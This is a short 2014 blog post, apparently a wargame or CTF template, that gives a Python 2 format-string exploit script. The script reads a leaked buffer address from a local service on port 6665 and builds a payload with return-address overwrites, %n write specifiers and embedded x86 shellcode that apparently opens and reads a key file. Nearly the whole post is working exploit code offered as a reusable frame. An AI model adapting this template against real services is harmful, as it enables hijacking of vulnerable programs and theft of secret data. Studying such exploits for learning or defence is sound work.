
Format String Bug python frame

cheesechoi 2014. 6. 27. 10:25




fsb 익스플로잇 기본틀




#/usr/bin/python
# Python 2 script (print statements, str used as a byte buffer): talks to a
# service on localhost:6665, reads its banner, and sends one crafted message.
from socket import *
from struct import *

# Shellcode and NOP sled definition
nopsled = "\x90"
sc = ""
#sc += nopsled*0x10
sc += "\x55\x89\xe5\x83\xec\x20\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x05\x6a\x79\x66\x68\x6b\x65\x89\xe3\xcd\x80\x89\xc3\xb0\x03\x8d\x4d\xe0\xb2\x21\xcd\x80\x89\xc2\xb0\x04\xb3\x04\xcd\x80\xc9\xc3"


s = socket(AF_INET, SOCK_STREAM)
s.connect(("localhost", 6665))

# First message from the service; expected to begin with "Attack 0x".
rv = s.recv(1024)
print rv

# Memory-leak frame

## string -> int
# Strips the "Attack 0x" prefix and the last 3 characters, then parses the
# rest as hexadecimal.
addrStr = rv[len("Attack 0x"):-3]
addrHex = int(addrStr, 16)
print "addrHex : %X"%addrHex


# Address where the shellcode will sit. Start from the buffer address and
# adjust later.
# lowBufAddr: the 4 hex digits after "0x"; highBufAddr: 4 digits taken from
# the end of hex(addrHex), skipping its final character.
lowBufAddr = int(hex(addrHex)[len("0x"):len("0x")+4],16)
highBufAddr = int(hex(addrHex)[-5:-1],16)



# Buffer offset relative to ebp
buftoebp = 0x198

# Build payload: two little-endian 32-bit addresses, each followed by 4 filler bytes.
payload = ""
payload += pack('<I', addrHex+buftoebp+4)		# RET (low half)
payload += "AAAA"
payload += pack('<I', addrHex+buftoebp+4+2)		# RET + 2 (high half)
payload += "AAAA"

# Compute the address where the shellcode will sit: buf + payload length so far
highBufAddr += len(payload)
print "lowBufAddr = %x"%lowBufAddr
print "highBufAddr = %x"%highBufAddr


payload += sc

# Number of format specifiers needed
cPercentX = 2
payload += "%08x"*cPercentX

# Bytes emitted so far: 4 words (16 bytes) + shellcode + 8 chars per "%08x".
length = 4*4 + len(sc) + 8*cPercentX


count1 = highBufAddr - length
count2 = 0x10000+lowBufAddr - highBufAddr # keep the value positive when the subtraction would go negative


print "c1 : %d, c2 : %d"%(count1, count2)

# "%%%dc%%n" % count renders as "%<count>c%n".
payload += "%%%dc%%n"%count1
payload += "%%%dc%%n"%count2

print "length : %d"%len(payload)
print "payload : :%s"%payload
s.send(payload)


rv = s.recv(1024)
print rv

s.close()


